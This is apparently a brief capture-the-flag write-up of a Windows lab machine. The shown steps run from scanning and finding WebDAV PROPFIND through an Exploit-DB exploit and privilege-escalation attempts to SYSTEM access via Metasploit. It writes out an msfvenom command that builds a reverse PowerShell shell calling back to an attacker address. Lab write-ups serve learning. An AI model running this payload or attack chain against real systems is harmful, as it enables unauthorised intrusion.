Starting with a basic nmap scan with nmap automator

We see that we only have the port 80 open

As we only have port 80 open we run a dirbuster scan against it to see any directories

We dont' have any directory listing

We have a method PROPFIND enabled on the server

Searching on the exploitdb we find an exploit

https://www.exploit-db.com/exploits/41738

Changing the ip and port number in the exploit

The exploit did'nt work

Using the exploit we found on github

We now are nt\authority network services

Starting a smbserver using impacket we copy the file churrasco.exe

I don't know why but the box kept giving an program too big to fit the memory error

Now we create a bat script using msfvenom

msfvenom -p cmd/windows/reverse_powershell lhost=10.10.16.200 lport=8888 > shell1.bat

We are now going to use the JuicyPotato exploit

Not sure why any of the exploits is not working

As a last resort we have to move to metasploit

We have got a meterpreter shell

We now have to migrate to another process

Running the metasploit exploit suggestor

So the exploit finally worked we are now nt\authority system

We have got the user.txt and the root.txt flag